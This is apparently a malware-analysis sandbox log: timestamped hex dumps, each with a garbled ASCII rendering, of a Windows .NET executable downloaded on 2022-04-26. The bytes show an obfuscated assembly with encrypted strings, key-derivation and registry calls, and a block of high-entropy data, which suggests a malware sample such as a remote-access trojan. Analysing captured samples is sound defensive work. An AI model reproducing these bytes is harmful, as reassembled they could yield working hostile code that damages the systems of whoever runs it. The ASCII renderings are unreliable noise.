                                                                              2022-04-26 19:08:58 UTC4341INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ec 70 2c 62 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 d4 00 00 00 0c 00 00 00 00 00 00 6e f3 00 00 00 20 00 00 00 00 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 01 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELp,bn @ @@
                                                                              2022-04-26 19:08:58 UTC4343INData Raw: 00 00 04 2a 1e 02 7b 2e 00 00 04 2a 72 02 18 28 5e 00 00 06 02 7b 2f 00 00 04 16 91 02 7b 2f 00 00 04 17 91 1e 62 60 68 2a ce 02 1a 28 5e 00 00 06 02 7b 2f 00 00 04 16 91 02 7b 2f 00 00 04 17 91 1e 62 60 02 7b 2f 00 00 04 18 91 1f 10 62 60 02 7b 2f 00 00 04 19 91 1f 18 62 60 2a 1a 73 ba 00 00 0a 7a 56 28 64 00 00 06 2d 0d 28 65 00 00 06 2c 06 14 28 bd 00 00 0a 2a 66 7e 67 00 00 04 28 33 00 00 0a 2c 0c 28 2f 00 00 06 2c 05 28 68 00 00 06 2a 56 02 15 7d 31 00 00 04 02 28 1a 00 00 0a 02 03 7d 30 00 00 04 2a 4a 02 7b 30 00 00 04 02 7b 31 00 00 04 6f d0 00 00 0a 2a 8a 02 02 7b 31 00 00 04 17 58 7d 31 00 00 04 02 7b 31 00 00 04 02 7b 30 00 00 04 6f d1 00 00 0a fe 04 2a 22 02 15 7d 31 00 00 04 2a 2e 73 72 00 00 06 80 32 00 00 04 2a 2e 28 70 00 00 06 2d 02 16 2a
                                                                              Data Ascii: *{.*r(^{/{/b`h*(^{/{/b`{/b`{/b`*szV(d-(e,(*f~g(3,(/,(h*V}1(}0*J{0{1o*{1X}1{1{0o*"}1*.sr2*.(p-*
                                                                              2022-04-26 19:08:58 UTC4344INData Raw: 6f 00 00 04 2a 52 02 1e 7d 70 00 00 04 02 03 8c be 00 00 01 7d 6f 00 00 04 2a 1e 02 28 f6 00 00 06 2a 22 02 03 28 f5 00 00 06 2a 1e 02 28 eb 00 00 06 2a 22 02 03 28 e8 00 00 06 2a 1e 02 28 ec 00 00 06 2a 22 02 03 28 f9 00 00 06 2a 1e 02 7b 70 00 00 04 2a 32 02 7b 72 00 00 04 73 69 00 00 06 2a c2 02 28 0a 01 00 06 25 7e 7b 00 00 0a 28 84 00 00 0a 2c 16 02 20 de 9c 41 e9 28 53 00 00 06 28 85 00 00 0a 73 68 01 00 0a 7a 03 28 0b 01 00 06 2a b2 02 03 28 09 01 00 06 25 7e 7b 00 00 0a 28 84 00 00 0a 2c 10 20 99 9c 41 e9 28 53 00 00 06 73 83 00 00 0a 7a 04 05 28 0d 01 00 06 2a 3e 02 03 28 6a 01 00 0a 04 50 6f 6b 01 00 0a 2a 00 00 1b 30 02 00 1b 00 00 00 01 00 00 11 02 7b 01 00 00 04 0a 06 1f fd 2e 04 06 17 33 0a 00 de 07 02 28 04 00 00 06 dc 2a 00 01 10 00 00 02
                                                                              Data Ascii: o*R}p}o*(*"(*(*"(*(*"(*{p*2{rsi*(%~{(, A(S(shz(*(%~{(, A(Ssz(*>(jPok*0{.3(*
                                                                              2022-04-26 19:08:58 UTC4345INData Raw: 6f 22 00 00 0a 20 c6 9d 41 e9 28 53 00 00 06 20 ca 9d 41 e9 28 53 00 00 06 6f 22 00 00 0a 28 25 00 00 0a 6f 00 01 00 06 25 20 be 9d 41 e9 28 53 00 00 06 6f f3 00 00 06 28 a3 00 00 06 0a 12 00 28 24 00 00 0a 6f 00 01 00 06 25 20 a3 9d 41 e9 28 53 00 00 06 6f f3 00 00 06 28 26 00 00 0a 6f 27 00 00 0a 6f 28 00 00 0a 6f 00 01 00 06 25 20 96 9d 41 e9 28 53 00 00 06 6f f3 00 00 06 7e 5c 00 00 04 6f 00 01 00 06 25 20 84 9d 41 e9 28 53 00 00 06 6f f3 00 00 06 28 2f 00 00 06 0a 12 00 28 24 00 00 0a 6f 29 00 00 0a 20 88 9d 41 e9 28 53 00 00 06 20 84 9d 41 e9 28 53 00 00 06 6f 22 00 00 0a 20 73 9d 41 e9 28 53 00 00 06 20 1b 9c 41 e9 28 53 00 00 06 6f 22 00 00 0a 6f 00 01 00 06 25 20 67 9d 41 e9 28 53 00 00 06 6f f3 00 00 06 28 36 00 00 06 6f 00 01 00 06 25 20 52 9d
                                                                              Data Ascii: o" A(S A(So"(%o% A(So(($o% A(So(&o'o(o% A(So~\o% A(So(/($o) A(S A(So" sA(S A(So"o% gA(So(6o% R
                                                                              2022-04-26 19:08:58 UTC4347INData Raw: 00 06 16 18 6f 36 00 00 0a 2a 03 1f e0 6a 30 14 02 20 d0 00 00 00 6f 34 00 00 0a 02 03 d2 6f 34 00 00 0a 2a 02 03 d2 6f 34 00 00 0a 2a 00 00 00 1b 30 03 00 55 00 00 00 0b 00 00 11 02 28 1a 00 00 0a 03 28 3a 00 00 0a 2c 10 20 f0 98 41 e9 28 53 00 00 06 73 3b 00 00 0a 7a 03 7e 1b 00 00 04 20 50 c3 00 00 73 3c 00 00 0a 0a 02 06 1f 20 6f 3d 00 00 0a 7d 19 00 00 04 02 06 1f 40 6f 3d 00 00 0a 7d 1a 00 00 04 de 07 06 6f 3e 00 00 0a dc 2a 00 00 00 01 10 00 00 02 00 2f 00 1e 4d 00 07 00 00 00 00 1b 30 05 00 fc 00 00 00 0c 00 00 11 03 2d 10 20 b4 98 41 e9 28 53 00 00 06 73 43 00 00 0a 7a 73 44 00 00 0a 0a 06 1f 20 6a 6f 45 00 00 0a 73 46 00 00 0a 0b 07 20 00 01 00 00 6f 47 00 00 0a 07 20 80 00 00 00 6f 48 00 00 0a 07 17 6f 49 00 00 0a 07 18 6f 4a 00 00 0a 07 02 7b
                                                                              Data Ascii: o6*j0 o4o4*o4*0U((:, A(Ss;z~ Ps< o=}@o=}o>*/M0- A(SsCzsD joEsF oG oHoIoJ{
                                                                              2022-04-26 19:08:58 UTC4348INData Raw: 06 26 de 03 26 de 00 2a 00 00 00 01 10 00 00 00 00 00 00 0d 0d 00 03 01 00 00 01 1b 30 03 00 34 00 00 00 11 00 00 11 20 00 01 00 00 73 6f 00 00 0a 0a 28 95 00 00 06 06 20 00 01 00 00 28 96 00 00 06 16 31 09 06 6f 1f 00 00 0a 0b de 0b de 03 26 de 00 7e 2f 00 00 0a 2a 07 2a 01 10 00 00 00 00 00 00 29 29 00 03 01 00 00 01 1b 30 03 00 b7 00 00 00 12 00 00 11 7e 70 00 00 0a 20 95 9e 41 e9 28 53 00 00 06 6f 71 00 00 0a 0a 06 20 87 9e 41 e9 28 53 00 00 06 6f 72 00 00 0a 2c 10 06 20 87 9e 41 e9 28 53 00 00 06 6f 73 00 00 0a 06 6f 74 00 00 0a de 03 26 de 00 00 7e 70 00 00 0a 20 74 9e 41 e9 28 53 00 00 06 17 6f 75 00 00 0a 20 7b 9e 41 e9 28 53 00 00 06 17 6f 75 00 00 0a 20 69 9e 41 e9 28 53 00 00 06 6f 76 00 00 0a de 03 26 de 00 00 7e 70 00 00 0a 20 74 9e 41 e9 28
                                                                              Data Ascii: &&*04 so( (1o&~/**))0~p A(Soq A(Sor, A(Sosot&~p tA(Sou {A(Sou iA(Sov&~p tA(
                                                                              2022-04-26 19:08:58 UTC4349INData Raw: 00 00 0a 28 90 00 00 0a de 00 2a 00 00 00 01 10 00 00 00 00 0d 00 5e 6b 00 2d 6f 00 00 01 1b 30 03 00 67 00 00 00 17 00 00 11 20 4d 99 41 e9 28 53 00 00 06 28 3e 00 00 06 0a 28 26 00 00 0a 6f 88 00 00 0a 6f 92 00 00 0a 0b 2b 29 07 6f 03 00 00 0a 74 06 00 00 01 6f 93 00 00 0a 06 28 94 00 00 0a 2c 11 02 06 20 38 99 41 e9 28 53 00 00 06 28 3f 00 00 06 07 6f 04 00 00 0a 2d cf de 11 07 75 4b 00 00 01 0c 08 2c 06 08 6f 3e 00 00 0a dc 2a 00 01 10 00 00 02 00 20 00 35 55 00 11 00 00 00 00 13 30 02 00 3b 00 00 00 18 00 00 11 28 95 00 00 0a 1a 33 04 16 0a 2b 02 17 0a 06 2c 15 7e 1f 00 00 04 28 40 00 00 06 7e 1d 00 00 04 28 41 00 00 06 2a 7e 20 00 00 04 28 40 00 00 06 7e 1e 00 00 04 28 41 00 00 06 2a 00 13 30 03 00 14 00 00 00 18 00 00 11 16 7e 61 00 00 04 12 00 73
                                                                              Data Ascii: (*^k-o0g MA(S(>(&oo+)oto(, 8A(S(?o-uK,o>* 5U0;(3+,~(@~(A*~ (@~(A*0~as
                                                                              2022-04-26 19:08:58 UTC4351INData Raw: 7e 2a 00 00 04 20 f2 68 01 fe 06 59 07 58 61 80 2a 00 00 04 11 27 d0 7b 00 00 01 28 a5 00 00 0a fe 01 13 11 7e 2a 00 00 04 06 20 df 10 02 02 61 07 61 61 80 2a 00 00 04 11 11 2d 2f 11 27 14 fe 01 13 11 11 11 2c 24 11 0d 11 1e 28 57 00 00 06 2c 05 16 13 11 2b 14 7e 2a 00 00 04 20 14 be 76 3d 06 58 07 58 61 80 2a 00 00 04 11 11 11 0d 14 fe 03 33 0d 7e 2a 00 00 04 1f 20 61 80 2a 00 00 04 7e 2a 00 00 04 06 20 d9 0b 02 02 61 07 59 11 08 17 58 60 61 80 2a 00 00 04 11 32 73 59 00 00 06 80 2b 00 00 04 7e 2b 00 00 04 6f 5b 00 00 06 20 8e 07 fe fd 06 59 07 61 66 66 65 65 66 65 66 65 66 66 65 68 61 68 13 23 11 23 2d 28 7e 2b 00 00 04 6f 5b 00 00 06 06 20 6e 3b 73 3d 58 07 60 66 65 66 65 66 66 65 66 65 66 65 68 61 68 80 26 00 00 04 2b 11 7e 2b 00 00 04 11 23 6f 60 00
                                                                              Data Ascii: ~* hYXa*'{(~* aaa*-/',$(W,+~* v=XXa*3~* a*~* aYX`a*2sY+~+o[ Yaffeefefeffehah##-(~+o[ n;s=X`fefeffefefehah&+~+#o`
                                                                              2022-04-26 19:08:58 UTC4352INData Raw: 07 58 33 2f 11 18 8d 7e 00 00 01 13 25 16 13 12 2b 10 11 25 11 12 11 10 11 12 91 9d 11 12 17 58 13 12 11 12 11 18 32 ea 11 25 73 ae 00 00 0a 13 04 2b 13 28 af 00 00 0a 11 10 16 11 10 8e 69 6f b0 00 00 0a 13 04 11 0a 06 20 c0 10 02 02 61 07 59 19 11 0a 5f 58 1b 62 58 13 0a 11 0a 06 20 5b 88 1a 02 58 07 61 2e 48 02 11 05 58 06 20 07 50 82 fd 61 07 58 61 11 0a 20 ce f4 01 02 06 58 07 59 5f 61 13 38 12 38 73 9a 00 00 0a 13 06 20 67 ee fd fd 06 61 07 58 0c 11 06 08 d2 28 ab 00 00 0a 26 11 06 28 ac 00 00 0a 28 b1 00 00 0a 13 04 11 34 16 fe 01 03 5f 2c 47 11 04 28 b2 00 00 0a 13 04 7e 27 00 00 04 02 11 04 6f b3 00 00 0a 7e 27 00 00 04 6f b4 00 00 0a 06 20 3e f0 01 02 58 07 59 33 1c 7e 2b 00 00 04 6f 5f 00 00 06 14 80 2b 00 00 04 14 80 28 00 00 04 14 80 29 00 00
                                                                              Data Ascii: X3/~%+%X2%s+(io aY_XbX [Xa.HX PaXa XY_a88s gaX(&((4_,G(~'o~'o >XY3~+o_+()
                                                                              2022-04-26 19:08:58 UTC4353INData Raw: 00 00 01 1b 30 03 00 88 01 00 00 26 00 00 11 28 aa 00 00 0a d0 1e 00 00 02 28 a5 00 00 0a 6f b9 00 00 0a 33 07 28 6f 00 00 06 2d 03 16 6a 2a 7e 32 00 00 04 25 13 0b 28 a6 00 00 0a 7e 32 00 00 04 6f 73 00 00 06 0c 08 16 6a 40 38 01 00 00 28 a9 00 00 0a 13 08 73 d2 00 00 0a 0b 11 08 6f b5 00 00 0a 13 07 de 11 26 11 08 6f b6 00 00 0a 73 b7 00 00 0a 13 07 de 00 11 07 6f b8 00 00 0a 0d 09 2c 07 09 8e 69 2d 02 14 0d 09 2c 07 07 09 6f d3 00 00 0a 07 28 af 00 00 0a 11 07 6f d4 00 00 0a 6f 40 00 00 0a 6f d3 00 00 0a d0 1e 00 00 02 28 a5 00 00 0a 28 71 00 00 06 13 05 28 7b 00 00 06 13 06 07 11 05 1f 10 63 d2 6f d5 00 00 0a 07 11 06 1f 18 63 d2 6f d5 00 00 0a 07 11 05 d2 6f d5 00 00 0a 07 11 06 d2 6f d5 00 00 0a 07 11 05 1e 63 d2 6f d5 00 00 0a 07 11 06 1e 63 d2 6f
                                                                              Data Ascii: 0&((o3(o-j*~2%(~2osj@8(so&oso,i-,o(oo@o((q({cocooococo
                                                                              2022-04-26 19:08:58 UTC4355INData Raw: 79 00 00 06 28 78 00 00 06 61 28 77 00 00 06 2a 00 00 03 30 03 00 64 00 00 00 00 00 00 00 28 7d 00 00 06 20 8e 0b 8b e0 66 65 66 66 65 65 66 65 66 65 66 61 d0 25 00 00 02 28 a5 00 00 0a 28 71 00 00 06 28 77 00 00 06 d0 22 00 00 02 28 a5 00 00 0a 28 71 00 00 06 d0 20 00 00 02 28 a5 00 00 0a 28 71 00 00 06 61 20 70 00 b6 0d 66 65 66 65 66 66 65 66 65 65 66 28 78 00 00 06 28 79 00 00 06 2a 03 30 06 00 74 00 00 00 00 00 00 00 d0 25 00 00 02 28 a5 00 00 0a 28 71 00 00 06 d0 22 00 00 02 28 a5 00 00 0a 28 71 00 00 06 d0 23 00 00 02 28 a5 00 00 0a 28 71 00 00 06 d0 24 00 00 02 28 a5 00 00 0a 28 71 00 00 06 d0 26 00 00 02 28 a5 00 00 0a 28 71 00 00 06 d0 20 00 00 02 28 a5 00 00 0a 28 71 00 00 06 28 77 00 00 06 28 79 00 00 06 28 78 00 00 06 28 77 00 00 06 28 79 00
                                                                              Data Ascii: y(xa(w*0d(} feffeefefefa%((q(w"((q ((qa pfefeffefeef(x(y*0t%((q"((q#((q$((q&((q ((q(w(y(x(w(y
                                                                              2022-04-26 19:08:58 UTC4356INData Raw: 18 06 2c 06 06 6f 3e 00 00 0a dc 6f 8f 00 00 0a 28 d9 00 00 06 de 00 16 2a 07 2a 00 00 01 1c 00 00 02 00 11 00 0f 20 00 0a 00 00 00 00 00 00 00 00 2a 2a 00 0c 6f 00 00 01 1b 30 04 00 c3 00 00 00 30 00 00 11 1b 8d 01 00 00 01 25 16 28 ed 00 00 0a 8c 3c 00 00 01 a2 25 17 28 1e 00 00 0a a2 25 18 28 62 00 00 0a a2 25 19 28 ee 00 00 0a a2 25 1a 28 ef 00 00 0a 28 f0 00 00 0a 73 f1 00 00 0a 28 f2 00 00 0a 8c 93 00 00 01 a2 28 f3 00 00 0a 13 05 73 f4 00 00 0a 28 3f 00 00 0a 11 05 6f 40 00 00 0a 0b 07 6f f5 00 00 0a 0b 73 9a 00 00 0a 0c 07 0d 16 0a 2b 21 09 06 91 13 06 08 12 06 20 4f 9c 41 e9 28 53 00 00 06 28 f6 00 00 0a 6f 9c 00 00 0a 26 06 17 58 0a 06 09 8e 69 32 d9 08 6f 1f 00 00 0a 16 1f 14 6f f7 00 00 0a 6f f8 00 00 0a 13 04 de 0f 26 20 30 9c 41 e9 28 53 00
                                                                              Data Ascii: ,o>o(** **o00%(<%(%(b%(%((s((s(?o@os+! OA(S(o&Xi2ooo& 0A(S
                                                                              2022-04-26 19:08:58 UTC4357INData Raw: 0a 73 1a 01 00 0a 7e 5b 00 00 04 17 8d 7e 00 00 01 25 16 1f 2c 9d 6f 19 01 00 0a 8e 69 6f 1b 01 00 0a 9a 0c 7e 5a 00 00 04 17 8d 7e 00 00 01 25 16 1f 2c 9d 6f 19 01 00 0a 73 1a 01 00 0a 7e 5a 00 00 04 17 8d 7e 00 00 01 25 16 1f 2c 9d 6f 19 01 00 0a 8e 69 6f 1b 01 00 0a 9a 28 31 00 00 0a 13 04 08 28 cf 00 00 06 2c 4a 08 28 1c 01 00 0a 13 05 16 0a 2b 32 11 05 06 a3 9d 00 00 01 13 06 28 b9 00 00 06 11 06 11 04 6f 1d 01 00 0a 28 b9 00 00 06 6f 1e 01 00 0a 2c 05 dd b5 00 00 00 de 03 26 de 00 06 17 58 0a 06 11 05 8e 69 32 c7 38 a0 00 00 00 28 b9 00 00 06 08 11 04 6f 1f 01 00 0a 38 8e 00 00 00 73 20 01 00 0a 0b 7e 2f 00 00 0a 7e 2f 00 00 0a 73 21 01 00 0a 13 07 07 11 07 6f 22 01 00 0a 07 7e 66 00 00 04 6f 23 01 00 0a 17 8d 40 00 00 01 25 16 20 6d 98 41 e9 28 53
                                                                              Data Ascii: s~[~%,oio~Z~%,os~Z~%,oio(1(,J(+2(o(o,&Xi28(o8s ~/~/s!o"~fo#@% mA(S
                                                                              2022-04-26 19:08:58 UTC4359INData Raw: 73 56 00 00 0a 0a 16 13 04 06 16 6a 6f 45 00 00 0a 20 50 c3 00 00 8d 58 00 00 01 0b 2b 25 28 b9 00 00 06 15 17 6f 39 01 00 0a 26 28 bb 00 00 06 07 16 11 04 6f 36 00 00 0a 28 bb 00 00 06 6f 79 00 00 0a 06 07 16 07 8e 69 6f 57 00 00 0a 25 13 04 16 30 ca de 2d 06 6f 3e 00 00 0a dc 28 b9 00 00 06 15 17 6f 39 01 00 0a 26 28 bb 00 00 06 02 16 02 8e 69 6f 36 00 00 0a 28 bb 00 00 06 6f 79 00 00 0a de 14 26 16 28 c6 00 00 06 de 0b 11 05 2c 06 08 28 a8 00 00 0a dc 2a 00 01 28 00 00 02 00 53 00 50 a3 00 07 00 00 00 00 00 00 11 00 c1 d2 00 09 01 00 00 01 02 00 09 00 d2 db 00 0b 00 00 00 00 0b 30 03 00 59 00 00 00 00 00 00 00 73 dd 00 00 06 25 20 55 98 41 e9 28 53 00 00 06 6f f3 00 00 06 20 5b 98 41 e9 28 53 00 00 06 6f 00 01 00 06 25 20 4e 98 41 e9 28 53 00 00 06 6f
                                                                              Data Ascii: sVjoE PX+%(o9&(o6(oyioW%0-o>(o9&(io6(oy&(,(*(SP0Ys% UA(So [A(So% NA(So
                                                                              2022-04-26 19:08:58 UTC4360INData Raw: 00 06 28 d3 00 00 06 20 e8 03 00 00 28 30 00 00 0a 2a 03 30 03 00 45 00 00 00 00 00 00 00 73 dd 00 00 06 25 20 55 98 41 e9 28 53 00 00 06 6f f3 00 00 06 20 92 99 41 e9 28 53 00 00 06 6f 00 01 00 06 25 20 92 99 41 e9 28 53 00 00 06 6f f3 00 00 06 02 6f 00 01 00 06 6f fd 00 00 06 28 d3 00 00 06 2a 00 00 00 13 30 01 00 a7 00 00 00 00 00 00 00 72 01 00 00 70 80 5a 00 00 04 72 b4 00 00 70 80 5b 00 00 04 72 67 01 00 70 80 5c 00 00 04 72 1a 02 00 70 80 5d 00 00 04 72 cd 02 00 70 80 5e 00 00 04 72 e1 02 00 70 80 5f 00 00 04 72 fd 02 00 70 80 60 00 00 04 72 57 03 00 70 80 61 00 00 04 72 32 04 00 70 80 62 00 00 04 72 e5 0c 00 70 80 63 00 00 04 72 40 0f 00 70 80 66 00 00 04 72 43 10 00 70 80 67 00 00 04 14 80 68 00 00 04 72 f6 10 00 70 80 69 00 00 04 72 fc 10 00 70
                                                                              Data Ascii: ( (0*0Es% UA(So A(So% A(Sooo(*0rpZrp[rgp\rp]rp^rp_rp`rWpar2pbrpcr@pfrCpghrpirp
                                                                              2022-04-26 19:08:58 UTC4361INData Raw: 00 06 09 17 58 0d 09 06 32 e6 2a 00 00 13 30 02 00 96 00 00 00 3b 00 00 11 02 7b 70 00 00 04 0a 06 1a 59 45 07 00 00 00 1f 00 00 00 02 00 00 00 13 00 00 00 68 00 00 00 35 00 00 00 46 00 00 00 57 00 00 00 2b 66 02 7b 6f 00 00 04 a5 93 00 00 01 28 52 01 00 0a 2a 02 7b 6f 00 00 04 a5 bd 00 00 01 2a 02 7b 6f 00 00 04 6f 1f 00 00 0a 6f 53 01 00 0a 28 54 01 00 0a 2a 02 7b 6f 00 00 04 a5 be 00 00 01 28 55 01 00 0a 2a 02 7b 6f 00 00 04 a5 bf 00 00 01 28 56 01 00 0a 2a 02 7b 6f 00 00 04 a5 3d 00 00 01 28 57 01 00 0a 2a 16 6a 2a 00 00 13 30 02 00 96 00 00 00 3b 00 00 11 02 7b 70 00 00 04 0a 06 1a 59 45 07 00 00 00 1f 00 00 00 02 00 00 00 0e 00 00 00 68 00 00 00 35 00 00 00 46 00 00 00 57 00 00 00 2b 66 02 7b 6f 00 00 04 a5 93 00 00 01 2a 02 7b 6f 00 00 04 a5 93 00
                                                                              Data Ascii: X2*0;{pYEh5FW+f{o(R*{o*{oooS(T*{o(U*{o(V*{o=(W*j*0;{pYEh5FW+f{o*{o
                                                                              2022-04-26 19:08:58 UTC4363INData Raw: 08 6f 57 00 00 0a 26 02 07 28 ed 00 00 06 2a 06 20 c5 00 00 00 33 39 18 8d 58 00 00 01 0b 03 07 16 18 6f 57 00 00 0a 26 07 28 4d 00 00 06 0b 07 16 28 14 01 00 0a 0c 08 8d 58 00 00 01 0b 03 07 16 08 6f 57 00 00 0a 26 02 07 28 ed 00 00 06 2a 06 20 c6 00 00 00 33 39 1a 8d 58 00 00 01 0b 03 07 16 1a 6f 57 00 00 0a 26 07 28 4d 00 00 06 0b 07 16 28 77 00 00 0a 0c 08 8d 58 00 00 01 0b 03 07 16 08 6f 57 00 00 0a 26 02 07 28 ed 00 00 06 2a 06 20 c7 00 00 00 2e 10 06 20 c8 00 00 00 2e 08 06 20 c9 00 00 00 33 10 20 dd 91 41 e9 28 53 00 00 06 73 61 01 00 0a 7a 06 20 ca 00 00 00 33 26 1a 8d 58 00 00 01 0b 03 07 16 1a 6f 57 00 00 0a 26 07 28 4d 00 00 06 0b 02 07 16 28 62 01 00 0a 28 f8 00 00 06 2a 06 20 cb 00 00 00 33 26 1e 8d 58 00 00 01 0b 03 07 16 1e 6f 57 00 00 0a
                                                                              Data Ascii: oW&(* 39XoW&(M(XoW&(* 39XoW&(M(wXoW&(* . . 3 A(Ssaz 3&XoW&(M(b(* 3&XoW
                                                                              2022-04-26 19:08:58 UTC4364INData Raw: 06 2a 03 02 7b 6f 00 00 04 a5 bf 00 00 01 6c 28 22 00 00 06 2a 03 02 28 eb 00 00 06 28 26 00 00 06 2a 03 02 7b 6f 00 00 04 74 09 00 00 1b 28 21 00 00 06 2a 02 03 28 e6 00 00 06 2a 02 03 28 e7 00 00 06 2a 03 28 1f 00 00 06 2a 1b 30 03 00 39 00 00 00 43 00 00 11 02 0a 16 0b 06 12 01 28 38 01 00 0a 02 7b 73 00 00 04 2d 12 02 02 02 7b 72 00 00 04 73 99 00 00 06 7d 73 00 00 04 de 0a 07 2c 06 06 28 a8 00 00 0a dc 02 7b 73 00 00 04 2a 00 00 00 01 10 00 00 02 00 04 00 24 28 00 0a 00 00 00 00 1b 30 03 00 59 00 00 00 44 00 00 11 28 26 00 00 0a 6f 88 00 00 0a 6f 92 00 00 0a 0a 2b 24 06 6f 03 00 00 0a 74 06 00 00 01 0b 07 6f 93 00 00 0a 02 17 28 69 01 00 0a 2d 09 07 6f 8d 00 00 0a 0c de 21 06 6f 04 00 00 0a 2d d4 de 11 06 75 4b 00 00 01 0d 09 2c 06 09 6f 3e 00 00 0a
                                                                              Data Ascii: *{ol("*((&*{ot(!*(*(*(*09C(8{s-{rs}s,({s*$(0YD(&oo+$oto(i-o!o-uK,o>
                                                                              2022-04-26 19:08:58 UTC4365INData Raw: 12 bb 7b c4 8c 8f c4 49 36 f6 cf e1 9b 26 50 3c 6a f5 12 91 13 30 d4 ca 9b e2 a2 8d 2d 37 2b 6a f5 12 13 5c 00 86 60 fc 8c 2b 94 8e 8a e6 13 af df 5c 6a f5 12 94 07 fd bb 65 0e 77 71 f4 ef 94 09 6a c4 d1 0a 09 76 6a f5 12 4f ad f4 a0 0d 2c 34 d8 6c 47 39 bd 62 6a f5 12 78 93 85 b6 70 a8 42 9b 09 1a 2a 25 07 15 2e 76 90 69 f5 12 a5 e2 eb 4a 27 b9 9f bd 59 7d 4b 98 ae 4d 98 69 f5 12 fa ea 56 92 c4 e0 78 9d 87 d2 b5 49 0d df 47 b4 b5 d4 94 f5 ba 69 f5 12 74 4f dc be dc f1 28 b0 41 5d be 49 da f4 d4 69 f5 12 c7 89 84 d7 12 02 25 8a a6 ac 78 25 25 02 c6 69 f5 12 45 e5 1f 25 fe 01 e9 49 fe 64 33 a2 f6 98 f0 69 f5 12 2e ab a8 d6 e8 38 a1 1f 10 14 ec 68 d5 e0 e5 69 f5 12 25 a5 e5 79 99 d3 29 24 8a 75 48 fb 2e 08 0b 1e 69 f5 12 e0 1d 64 5c f8 8b 01 23 ca db 10 0a
                                                                              Data Ascii: {I6&P<j0-7+j\`+\jewqjvjO,4lG9bjxpB*%.viJ'Y}KMiVxIGitO(A]Ii%x%%iE%Id3i.8hi%y)$uH.id\#
                                                                              2022-04-26 19:08:58 UTC4367INData Raw: f5 69 8f 2b 6a 45 c5 24 7a 74 d5 4c ff 17 7d b8 e3 eb 08 57 c1 ab 33 60 73 fe 1a 12 a7 44 84 6c f5 12 ed 5d d1 99 e9 c2 ff f4 fb 5c 87 b6 6c f5 12 16 2c 83 6b 67 e7 36 52 b1 00 60 0a 81 6c f5 12 1f 86 2a 0b cb ee fe 5c 3d 93 63 4d 4d 26 07 d2 3b 88 7c ed ee d7 07 e0 89 ae f1 19 e9 c5 6a 8f e0 ff a2 b8 18 9e 84 d7 da af fc 8f 4b 72 c6 b3 ac f9 6c f5 12 f1 d4 5b ac f4 6c f5 12 2b f0 fc c4 35 0e 7a ee 6c f5 12 53 1c 60 6c 88 64 d1 dc 62 d8 3c 5e 18 6c f5 12 d5 0b 98 8f d7 e2 19 72 5c de 70 cb e0 86 4a 34 4b 32 0b 6c f5 12 13 3e 86 e6 e5 56 12 6c f0 df 1d cf 33 2d 6c f5 12 e9 45 99 5b f9 ba 21 6c f5 12 bd d6 b8 a7 36 53 75 2d 5f 6c f5 12 17 56 1c 65 78 fc dd b9 03 c0 5b 6c f5 12 24 d8 c9 b3 62 c0 88 d3 83 a9 3d 62 61 8c 45 4f 62 5b 30 2a 75 6c f5 12 2d 4d 67
                                                                              Data Ascii: i+jE$ztL}W3`sDl]\l,kg6R`l*\=cMM&;|jKrl[l+5zlS`ldb<^lr\pJ4K2l>Vl3-lE[!l6Su-_lVex[l$b=baEOb[0*ul-Mg
                                                                              2022-04-26 19:08:58 UTC4368INData Raw: 2c 1b 06 00 ce 0e 2c 1b 06 00 22 0a a0 0e 06 00 96 10 2c 1b 06 00 ea 12 a0 0e 06 00 e0 1a a0 0e 06 00 19 1c 62 0d 06 00 7c 0d 62 0d 06 00 46 05 62 0d 1e 00 4a 10 7f 19 7f 01 fb 13 00 00 1e 00 27 13 7f 19 1e 00 50 18 7f 19 1e 00 1a 18 7f 19 06 00 1c 1b dc 00 06 00 e2 1b dc 00 0e 00 62 0e 9c 0f 0e 00 ce 03 9c 0f 06 00 0b 17 c5 14 06 00 82 04 a0 0e 06 00 63 14 a0 0e 06 00 48 0d a6 14 06 00 89 11 a0 0e 06 00 36 11 a0 0e 06 00 d8 10 a0 0e 06 00 7f 11 a0 0e 0e 00 18 10 6a 14 12 00 62 04 30 12 06 00 ad 00 74 02 06 00 07 01 a0 0e 06 00 59 05 a0 0e 06 00 63 07 c2 16 06 00 53 0c 1a 02 06 00 e7 04 0e 0b 06 00 59 06 6a 14 06 00 58 07 ef 0f 06 00 d2 11 ef 0f 06 00 95 04 a0 0e 06 00 a9 04 a0 0e 06 00 3b 14 0e 0b 06 00 42 12 a0 0e 06 00 21 11 1a 02 06 00 ef 10 a0 0e 1e
                                                                              Data Ascii: ,,",b|bFbJ'PbcH6jb0tYcSYjX;B!
                                                                              2022-04-26 19:08:58 UTC4369INData Raw: 00 01 01 00 00 96 1c 00 00 35 00 42 00 b1 00 80 01 10 00 a1 00 00 00 05 00 43 00 b1 00 81 01 10 00 55 1c 00 00 05 00 43 00 b1 00 00 01 10 00 78 1c 00 00 05 00 43 00 b2 00 00 01 10 00 9b 1c 00 00 05 00 43 00 b4 00 81 01 10 00 be 18 65 10 05 00 43 00 b8 00 83 01 10 00 75 00 00 00 05 00 4f 00 da 00 09 01 10 00 cd 00 76 13 09 00 50 00 da 00 81 01 00 00 52 16 78 19 05 00 5a 00 da 00 01 00 10 00 aa 0c 8f 0c 05 00 6d 00 dd 00 01 01 10 00 69 02 00 00 05 00 74 00 08 01 02 01 00 00 75 00 00 00 35 00 74 00 0f 01 02 01 10 00 69 02 00 00 05 00 75 00 0f 01 02 01 00 00 b7 1b 00 00 91 00 75 00 10 01 01 00 75 00 17 00 01 00 81 00 17 00 01 00 99 00 17 00 01 00 9d 00 17 00 06 00 9b 00 17 00 01 00 9f 00 17 00 01 00 a1 00 17 00 01 00 37 1c 1a 00 01 00 3c 1c 17 00 01 00 75 00
